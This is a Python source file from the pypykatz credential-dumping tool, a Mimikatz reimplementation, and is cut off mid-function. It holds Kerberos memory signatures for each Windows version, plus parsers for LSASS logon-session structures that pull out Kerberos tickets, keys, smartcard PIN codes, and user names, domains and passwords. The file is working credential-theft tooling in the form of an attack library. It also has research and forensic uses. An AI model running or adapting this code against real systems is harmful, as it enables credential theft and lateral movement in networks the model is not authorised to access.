#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import io
from pypykatz.commons.common import KatzSystemArchitecture, WindowsMinBuild, WindowsBuild
from pypykatz.alsadecryptor.win_datatypes import POINTER, PVOID, ULONG, LIST_ENTRY, \
	DWORD, LSA_UNICODE_STRING, PKERB_EXTERNAL_NAME, KIWI_GENERIC_PRIMARY_CREDENTIAL, \
	LUID, PLSAISO_DATA_BLOB, ULONG64, FILETIME, PCWSTR, SIZE_T, BOOL
from pypykatz.alsadecryptor.package_commons import PackageTemplate

class KerberosTemplate(PackageTemplate):
	def __init__(self, sysinfo):
		super().__init__('Kerberos', sysinfo)
		self.signature = None
		self.first_entry_offset = None
		self.kerberos_session_struct = None
		self.kerberos_ticket_struct = None
		self.keys_list_struct = None
		self.hash_password_struct = None
		self.csp_info_struct = None
		
	@staticmethod
	def get_template(sysinfo):
		#input('%s %s' % (sysinfo.architecture,sysinfo.buildnumber))
		template = KerberosTemplate(sysinfo)
		if sysinfo.architecture == KatzSystemArchitecture.X64:		
			if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
				template.signature = b'\x48\x3b\xfe\x0f\x84'
				template.first_entry_offset = -4
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_51
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_51
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_5
				template.hash_password_struct = KERB_HASHPASSWORD_5
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_5
				
				
			elif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				template.signature = b'\x48\x3b\xfe\x0f\x84'
				template.first_entry_offset = -4
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_52
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_5
				template.hash_password_struct = KERB_HASHPASSWORD_5
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_5
				
			elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
				template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
				template.first_entry_offset = 6
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_60
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
				template.hash_password_struct = KERB_HASHPASSWORD_6
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_60
				
			elif WindowsMinBuild.WIN_7.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
				template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
				template.first_entry_offset = 6
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_6
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
				template.hash_password_struct = KERB_HASHPASSWORD_6
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_60
			
			elif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:
				template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
				template.first_entry_offset = 6
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_6
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
				template.hash_password_struct = KERB_HASHPASSWORD_6
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_62
				
			elif WindowsBuild.WIN_10_1507.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1511.value:
				template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
				template.first_entry_offset = 6
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_6
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
				template.hash_password_struct = KERB_HASHPASSWORD_6
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
				
			elif WindowsBuild.WIN_10_1511.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1607.value:
				template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
				template.first_entry_offset = 6
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_10
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
				template.hash_password_struct = KERB_HASHPASSWORD_6
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
				

			elif WindowsBuild.WIN_10_1607.value <= sysinfo.buildnumber < WindowsBuild.WIN_11_2022.value:
				template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
				template.first_entry_offset = 6
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10_1607
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_10_1607
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
				template.hash_password_struct = KERB_HASHPASSWORD_6_1607
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
			
			elif sysinfo.buildnumber >= WindowsBuild.WIN_11_2022.value:
				template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
				template.first_entry_offset = 6
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10_1607
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_11
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
				template.hash_password_struct = KERB_HASHPASSWORD_6_1607
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
			
			else:
				raise Exception('Could not identify template! Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber))
			
		
		elif sysinfo.architecture == KatzSystemArchitecture.X86:
			if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
				template.signature = b'\x8B\x7D\x08\x8B\x17\x39\x50'
				template.first_entry_offset = -8
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_51
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_51
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_5
				template.hash_password_struct = KERB_HASHPASSWORD_5
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_5
				
				
			elif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				template.signature = b'\x8B\x7D\x08\x8B\x17\x39\x50'
				template.first_entry_offset = -8
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_52
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_5
				template.hash_password_struct = KERB_HASHPASSWORD_5
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_5
				
			elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
				template.signature = b'\x53\x8b\x18\x50\x56'
				template.first_entry_offset = -11
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_60
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
				template.hash_password_struct = KERB_HASHPASSWORD_6
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_60
				
			elif WindowsMinBuild.WIN_7.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
				template.signature = b'\x53\x8b\x18\x50\x56'
				template.first_entry_offset = -11
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_6
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
				template.hash_password_struct = KERB_HASHPASSWORD_6
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_60
				
			elif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsBuild.WIN_BLUE.value:
				template.signature = b'\x57\x8b\x38\x50\x68'
				template.first_entry_offset = -14
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_6
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
				template.hash_password_struct = KERB_HASHPASSWORD_6
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_62
				
			elif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:
				template.signature = b'\x56\x8b\x30\x50\x57'
				template.first_entry_offset = -15
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_6
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
				template.hash_password_struct = KERB_HASHPASSWORD_6
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_62
			
			####DOUBLE CHECK THE STRUCTURES BELOW THIS LINE!!!!
			#### kerbHelper[N] -> KerberosReferences... {-15,7}}, here N= 7
			
			elif WindowsBuild.WIN_10_1507.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1511.value:
				template.signature = b'\x56\x8b\x30\x50\x57'
				template.first_entry_offset = -15
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10_X86
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_6
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
				template.hash_password_struct = KERB_HASHPASSWORD_6
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
				
				
			elif WindowsBuild.WIN_10_1511.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1903.value:
				template.signature = b'\x56\x8b\x30\x50\x57'
				template.first_entry_offset = -15
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10_1607_X86
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_10_1607
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
				template.hash_password_struct = KERB_HASHPASSWORD_6_1607
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
				
				
			elif WindowsBuild.WIN_10_1903.value <= sysinfo.buildnumber:
				template.signature = b'\x56\x8b\x30\x50\x53'
				template.first_entry_offset = -15
				template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10_1607_X86
				template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_10_1607
				template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
				template.hash_password_struct = KERB_HASHPASSWORD_6_1607
				template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
		
		
		else:
			raise Exception('Unknown architecture! %s' % sysinfo.architecture)

			
		return template
		
class PKERB_SMARTCARD_CSP_INFO_5(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKERB_SMARTCARD_CSP_INFO_5()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KERB_SMARTCARD_CSP_INFO_5
		return p
		

class KERB_SMARTCARD_CSP_INFO_5:
	def __init__(self):
		#self.dwCspInfoLen = DWORD(reader).value
		self.ContextInformation = None
		self.nCardNameOffset = None
		self.nReaderNameOffset = None
		self.nContainerNameOffset = None
		self.nCSPNameOffset = None
		self.bBuffer = None


	@staticmethod
	async def load(reader, size):
		res = KERB_SMARTCARD_CSP_INFO_5()
		pos = reader.tell()
		#self.dwCspInfoLen = DWORD(reader).value
		res.ContextInformation = await PVOID.loadvalue(reader)
		res.nCardNameOffset = await ULONG.loadvalue(reader)
		res.nReaderNameOffset = await ULONG.loadvalue(reader)
		res.nContainerNameOffset = await ULONG.loadvalue(reader)
		res.nCSPNameOffset = await ULONG.loadvalue(reader)
		diff = reader.tell() - pos
		data = await reader.read(size - diff + 4)
		res.bBuffer = io.BytesIO(data)
		return res

	def read_wcharnull(self, buffer, tpos):
		pos = buffer.tell()
		buffer.seek(tpos, 0)
		data = b''
		i=0
		nc = 0
		while i < 255:
			if nc == 3:
				break
			c = buffer.read(1)
			if c == b'\x00':
				nc += 1
			else:
				nc = 0
			data += c
			i += 1
		buffer.seek(pos, 0)
		return data.decode('utf-16-le').replace('\x00', '')

	def get_infos(self):
		t = {}
		t['CardName'] = self.read_wcharnull(self.bBuffer, self.nCardNameOffset)
		t['ReaderName'] = self.read_wcharnull(self.bBuffer, self.nReaderNameOffset)
		t['ContainerName'] = self.read_wcharnull(self.bBuffer, self.nContainerNameOffset)
		t['CSPName'] = self.read_wcharnull(self.bBuffer, self.nCSPNameOffset)

		return t

class PKERB_SMARTCARD_CSP_INFO(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKERB_SMARTCARD_CSP_INFO()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KERB_SMARTCARD_CSP_INFO
		return p
		
		
class KERB_SMARTCARD_CSP_INFO:
	def __init__(self):
		self.MessageType = None
		self.ContextInformation = None
		self.SpaceHolderForWow64 = None
		self.flags = None
		self.KeySpec = None
		self.nCardNameOffset = None
		self.nReaderNameOffset = None
		self.nContainerNameOffset = None
		self.nCSPNameOffset = None
		self.bBuffer = None
	
	@staticmethod
	async def load(reader, size):
		res = KERB_SMARTCARD_CSP_INFO()
		pos = reader.tell()
		#self.dwCspInfoLen = DWORD(reader).value
		res.MessageType = await DWORD.loadvalue(reader).value
		res.ContextInformation = await PVOID.loadvalue(reader).value
		res.SpaceHolderForWow64 = await ULONG64.loadvalue(reader).value
		res.flags = await DWORD.loadvalue(reader).value
		res.KeySpec = await DWORD.loadvalue(reader).value
		res.nCardNameOffset = await ULONG.loadvalue(reader).value
		res.nCardNameOffset *= 2
		res.nReaderNameOffset = await ULONG.loadvalue(reader).value
		res.nReaderNameOffset *= 2
		res.nContainerNameOffset = await ULONG.loadvalue(reader).value
		res.nContainerNameOffset *= 2
		res.nCSPNameOffset = await ULONG.loadvalue(reader).value
		res.nCSPNameOffset *= 2
		diff = reader.tell() - pos
		data = await reader.read(size - diff + 4)
		res.bBuffer = io.BytesIO(data)
		return res

	def read_wcharnull(self, buffer, tpos):
		pos = buffer.tell()
		buffer.seek(tpos, 0)
		data = b''
		i=0
		nc = 0
		while i < 255:
			if nc == 3:
				break
			c = buffer.read(1)
			if c == b'\x00':
				nc += 1
			else:
				nc = 0
			data += c
			i += 1
		buffer.seek(pos, 0)
		return data.decode('utf-16-le').replace('\x00', '')

	def get_infos(self):
		t = {}
		t['CardName'] = self.read_wcharnull(self.bBuffer, self.nCardNameOffset)
		t['ReaderName'] = self.read_wcharnull(self.bBuffer, self.nReaderNameOffset)
		t['ContainerName'] = self.read_wcharnull(self.bBuffer, self.nContainerNameOffset)
		t['CSPName'] = self.read_wcharnull(self.bBuffer, self.nCSPNameOffset)

		return t
		
class PKIWI_KERBEROS_CSP_INFOS_5(POINTER):	
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_CSP_INFOS_5()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_CSP_INFOS_5
		return p

class KIWI_KERBEROS_CSP_INFOS_5:
	def __init__(self):	
		self.PinCode = None
		self.unk0 = None
		self.unk1 = None
		self.CertificateInfos = None
		self.unkData = None
		self.Flags = None
		self.CspDataLength = None
		self.CspData = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_CSP_INFOS_5()
		res.PinCode = await LSA_UNICODE_STRING.load(reader)
		res.unk0 = await PVOID.load(reader)
		res.unk1 = await PVOID.load(reader)
		res.CertificateInfos = await PVOID.load(reader)
		res.unkData = await PVOID.load(reader)                      #	// 0 = CspData
		res.Flags = await DWORD.loadvalue(reader)                  #	// 1 = CspData (not 0x21)(reader).value
		res.CspDataLength = await DWORD.loadvalue(reader)
		res.CspData = await KERB_SMARTCARD_CSP_INFO_5.load(reader, size = res.CspDataLength)
		return res

	 
class PKIWI_KERBEROS_CSP_INFOS_60(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_CSP_INFOS_60()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_CSP_INFOS_60
		return p


class KIWI_KERBEROS_CSP_INFOS_60:
	def __init__(self):
		self.PinCode = None
		self.unk0 = None
		self.unk1 = None
		self.CertificateInfos = None
		self.unkData = None
		self.Flags = None
		self.unkFlags = None
		self.CspDataLength = None
		self.CspData = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_CSP_INFOS_5()
		res.PinCode = await LSA_UNICODE_STRING.load(reader)
		res.unk0 = await PVOID.loadvalue(reader)
		res.unk1 = await PVOID.loadvalue(reader)
		res.CertificateInfos = await PVOID.loadvalue(reader)
		res.unkData = await PVOID.loadvalue(reader)           #	// 0 = CspData
		res.Flags    = await DWORD.loadvalue(reader)	            #// 0 = CspData(reader).value
		res.unkFlags = await DWORD.loadvalue(reader)      	#// 0x141(reader).value
		res.CspDataLength = await DWORD.loadvalue(reader)
		res.CspData = await KERB_SMARTCARD_CSP_INFO.load(reader, size = res.CspDataLength)
		return res

class PKIWI_KERBEROS_CSP_INFOS_62(POINTER):	
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_CSP_INFOS_62()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_CSP_INFOS_62
		return p

	 
class KIWI_KERBEROS_CSP_INFOS_62:
	def __init__(self):
		self.PinCode = None
		self.unk0 = None
		self.unk1 = None
		self.CertificateInfos = None
		self.unk2 = None
		self.unkData = None
		self.Flags = None
		self.unkFlags = None
		self.CspDataLength = None
		self.CspData = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_CSP_INFOS_62()
		res.PinCode = await LSA_UNICODE_STRING.load(reader)
		res.unk0 = await PVOID.loadvalue(reader)
		res.unk1 = await PVOID.loadvalue(reader)
		res.CertificateInfos = await PVOID.loadvalue(reader)
		res.unk2     = await PVOID.loadvalue(reader)
		res.unkData  = await PVOID.loadvalue(reader)	          #// 0 = CspData(reader).value
		res.Flags    = await DWORD.loadvalue(reader)	             #// 0 = CspData(reader).value
		res.unkFlags = await DWORD.loadvalue(reader)	            #// 0x141 (not 0x61)
		res.CspDataLength = await DWORD.loadvalue(reader)
		res.CspData = await KERB_SMARTCARD_CSP_INFO.load(reader, size = res.CspDataLength)
		return res

		
class PKIWI_KERBEROS_CSP_INFOS_10(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_CSP_INFOS_10()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_CSP_INFOS_10
		return p

class KIWI_KERBEROS_CSP_INFOS_10:
	def __init__(self):
		self.PinCode = None
		self.unk0 = None
		self.unk1 = None
		self.CertificateInfos = None
		self.unk2 = None
		self.unkData = None
		self.Flags = None
		self.unkFlags = None
		self.unk3 = None
		self.CspDataLength = None
		self.CspData = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_CSP_INFOS_10()
		res.PinCode = await LSA_UNICODE_STRING.load(reader)
		res.unk0    = await PVOID.loadvalue(reader)
		res.unk1    = await PVOID.loadvalue(reader)
		res.CertificateInfos = await PVOID.loadvalue(reader)
		res.unk2     = await PVOID.loadvalue(reader)
		res.unkData  = await PVOID.loadvalue(reader)	        #// 0 = CspData
		res.Flags    = await DWORD.loadvalue(reader)	            #// 0 = CspData(reader).value
		res.unkFlags = await DWORD.loadvalue(reader)	        #// 0x141 (not 0x61)(reader).value
		res.unk3     = await PVOID.loadvalue(reader)
		res.CspDataLength = await DWORD.loadvalue(reader)
		res.CspData = await KERB_SMARTCARD_CSP_INFO.load(reader, size = res.CspDataLength)
		return res

class PKIWI_KERBEROS_LOGON_SESSION_51(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_LOGON_SESSION_51()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_LOGON_SESSION_51
		return p

class KIWI_KERBEROS_LOGON_SESSION_51:
	def __init__(self):
		self.UsageCount = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None      #	// filetime.1 ?
		self.unk4 = None    	#// filetime.2 ?(reader).value
		self.unk5 = None
		self.unk6 = None
		self.unk7 = None
		self.LocallyUniqueIdentifier = None
		#self.unkAlign = ULONG(reader).value  #aliing on x86(reader).value
		self.unk8 = None
		self.unk9 = None
		self.unk10 = None     #	// filetime.1 ?(reader).value
		self.unk11 = None     #	// filetime.2 ?(reader).value
		self.unk12 = None
		self.unk13 = None
		self.unk14 = None
		self.credentials = None
		self.unk15 = None
		self.unk16 = None
		self.unk17 = None
		self.unk18 = None
		self.unk19 = None
		self.unk20 = None
		self.unk21 = None
		self.unk22 = None
		self.pKeyList = None
		self.unk24 = None
		self.Tickets_1 = None
		self.Tickets_2 = None
		self.Tickets_3 = None
		self.SmartcardInfos = None
	
	@staticmethod
	async def load(reader):
		#IMPORTANT NOTICE, THE STRUCTURE STARTS BEFORE THE FLINK/BLINK POINTER, SO WE NEED TO READ BACKWARDS
		res = KIWI_KERBEROS_LOGON_SESSION_51()
		res.UsageCount = await ULONG.loadvalue(reader)
		res.unk0 = await LIST_ENTRY.load(reader)
		res.unk1 = await LIST_ENTRY.load(reader)
		res.unk2 = await PVOID.loadvalue(reader)
		res.unk3 = await ULONG.loadvalue(reader)      #	// filetime.1 ?
		res.unk4 = await ULONG.loadvalue(reader)    	#// filetime.2 ?(reader).value
		res.unk5 = await PVOID.loadvalue(reader)
		res.unk6 = await PVOID.loadvalue(reader)
		res.unk7 = await PVOID.loadvalue(reader)
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		await reader.align(8)
		#self.unkAlign = ULONG(reader).value  #aliing on x86(reader).value
		res.unk8  = await FILETIME.loadvalue(reader)
		res.unk9  = await PVOID.loadvalue(reader)
		res.unk10 = await ULONG.loadvalue(reader)     #	// filetime.1 ?(reader).value
		res.unk11 = await ULONG.loadvalue(reader)     #	// filetime.2 ?(reader).value
		res.unk12 = await PVOID.loadvalue(reader)
		res.unk13 = await PVOID.loadvalue(reader)
		res.unk14 = await PVOID.loadvalue(reader)
		res.credentials = await KIWI_GENERIC_PRIMARY_CREDENTIAL.load(reader)
		res.unk15 = await ULONG.loadvalue(reader)
		res.unk16 = await ULONG.loadvalue(reader)
		res.unk17 = await ULONG.loadvalue(reader)
		res.unk18 = await ULONG.loadvalue(reader)
		res.unk19 = await PVOID.loadvalue(reader)
		res.unk20 = await PVOID.loadvalue(reader)
		res.unk21 = await PVOID.loadvalue(reader)
		res.unk22 = await PVOID.loadvalue(reader)
		res.pKeyList = await PVOID.load(reader)
		res.unk24 = await PVOID.loadvalue(reader)
		res.Tickets_1 = await LIST_ENTRY.load(reader)
		res.Tickets_2 = await LIST_ENTRY.load(reader)
		res.Tickets_3 = await LIST_ENTRY.load(reader)
		res.SmartcardInfos = await PVOID.load(reader)
		return res

		
class PKIWI_KERBEROS_LOGON_SESSION(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_LOGON_SESSION()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_LOGON_SESSION
		return p

class KIWI_KERBEROS_LOGON_SESSION:
	def __init__(self):
		self.UsageCount = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None     #	// filetime.1 ?
		self.unk3 = None	   #// filetime.2 ?(reader).value
		self.unk4 = None
		self.unk5 = None
		self.unk6 = None
		self.LocallyUniqueIdentifier = None
		#self.unkAlign = ULONG(reader).value#ifdef _M_IX86(reader).value
		self.unk7  = None
		self.unk8  = None
		self.unk9  = None      #	// filetime.1 ?(reader).value
		self.unk10 = None     #	// filetime.2 ?(reader).value
		self.unk11 = None
		self.unk12 = None
		self.unk13 = None
		self.credentials = None
		self.unk14 = None
		self.unk15 = None
		self.unk16 = None
		self.unk17 = None
		self.unk18 = None
		self.unk19 = None
		self.unk20 = None
		self.unk21 = None
		self.pKeyList = None
		self.unk23 = None
		self.Tickets_1 = None
		self.unk24 = None
		self.Tickets_2 = None
		self.unk25 = None
		self.Tickets_3 = None
		self.unk26 = None
		self.SmartcardInfos = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_LOGON_SESSION()
		res.UsageCount = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk0 = await LIST_ENTRY.load(reader)
		res.unk1 = await PVOID.loadvalue(reader)
		res.unk2 = await ULONG.loadvalue(reader)     #	// filetime.1 ?
		res.unk3 = await ULONG.loadvalue(reader)	   #// filetime.2 ?(reader).value
		res.unk4 = await PVOID.loadvalue(reader)
		res.unk5 = await PVOID.loadvalue(reader)
		res.unk6 = await PVOID.loadvalue(reader)
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		#self.unkAlign = ULONG(reader).value#ifdef _M_IX86(reader).value
		await reader.align(8)
		res.unk7  = await FILETIME.loadvalue(reader)
		res.unk8  = await PVOID.loadvalue(reader)
		res.unk9  = await ULONG.loadvalue(reader)      #	// filetime.1 ?(reader).value
		res.unk10 = await ULONG.loadvalue(reader)     #	// filetime.2 ?(reader).value
		res.unk11 = await PVOID.loadvalue(reader)
		res.unk12 = await PVOID.loadvalue(reader)
		res.unk13 = await PVOID.loadvalue(reader)
		res.credentials = await KIWI_GENERIC_PRIMARY_CREDENTIAL.load(reader)
		res.unk14 = await ULONG.loadvalue(reader)
		res.unk15 = await ULONG.loadvalue(reader)
		res.unk16 = await ULONG.loadvalue(reader)
		res.unk17 = await ULONG.loadvalue(reader)
		res.unk18 = await PVOID.loadvalue(reader)
		res.unk19 = await PVOID.loadvalue(reader)
		res.unk20 = await PVOID.loadvalue(reader)
		res.unk21 = await PVOID.loadvalue(reader)
		res.pKeyList = await PVOID.load(reader)
		res.unk23 = await PVOID.loadvalue(reader)
		await reader.align()
		res.Tickets_1 = await LIST_ENTRY.load(reader)
		res.unk24     = await FILETIME.loadvalue(reader)
		res.Tickets_2 = await LIST_ENTRY.load(reader)
		res.unk25     = await FILETIME.loadvalue(reader)
		res.Tickets_3 = await LIST_ENTRY.load(reader)
		res.unk26     = await FILETIME.loadvalue(reader)
		res.SmartcardInfos = await PVOID.load(reader)
		return res

class PKIWI_KERBEROS_10_PRIMARY_CREDENTIAL(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_10_PRIMARY_CREDENTIAL()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_10_PRIMARY_CREDENTIAL
		return p
		
class KIWI_KERBEROS_10_PRIMARY_CREDENTIAL:
	def __init__(self):
		self.UserName = None
		self.Domaine = None
		self.unk0 = None
		self.Password = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_10_PRIMARY_CREDENTIAL()
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.Domaine  = await LSA_UNICODE_STRING.load(reader)
		res.unk0 = await PVOID.loadvalue(reader)
		res.Password = await LSA_UNICODE_STRING.load(reader)
		return res

class PKIWI_KERBEROS_LOGON_SESSION_10(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_LOGON_SESSION_10()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_LOGON_SESSION_10
		return p
		
class KIWI_KERBEROS_LOGON_SESSION_10_X86:
	def __init__(self):	
		self.UsageCount = None
		self.unk0 = None
		self.unk1 = None
		self.unk1b = None
		self.unk2 = None
		self.unk4 = None
		self.unk5 = None
		self.unk6 = None
		self.LocallyUniqueIdentifier = None
		self.unk7 = None
		self.unk8 = None
		self.unk8b = None
		self.unk9 = None
		self.unk11 = None
		self.unk12 = None
		self.unk13 = None
		self.credentials = None
		self.unk14 = None
		self.unk15 = None
		self.unk16 = None
		self.unk17 = None
		self.unk19 = None
		self.unk20 = None
		self.unk21 = None
		self.unk22 = None
		self.unk23 = None
		self.unk24 = None
		self.unk25 = None
		self.pKeyList = None
		self.unk26 = None
		self.Tickets_1 = None
		self.unk27 = None
		self.Tickets_2 = None
		self.unk28 = None
		self.Tickets_3 = None
		self.unk29 = None
		self.SmartcardInfos = None
	

	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_LOGON_SESSION_10_X86()
		res.UsageCount = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk0  = await LIST_ENTRY.load(reader)
		res.unk1  = await PVOID.loadvalue(reader)
		res.unk1b = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk2 = await FILETIME.loadvalue(reader)
		res.unk4 = await PVOID.loadvalue(reader)
		res.unk5 = await PVOID.loadvalue(reader)
		res.unk6 = await PVOID.loadvalue(reader)
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		#print(hex(self.LocallyUniqueIdentifier))
		#input('unk7\n' + hexdump(reader.peek(0x100)))
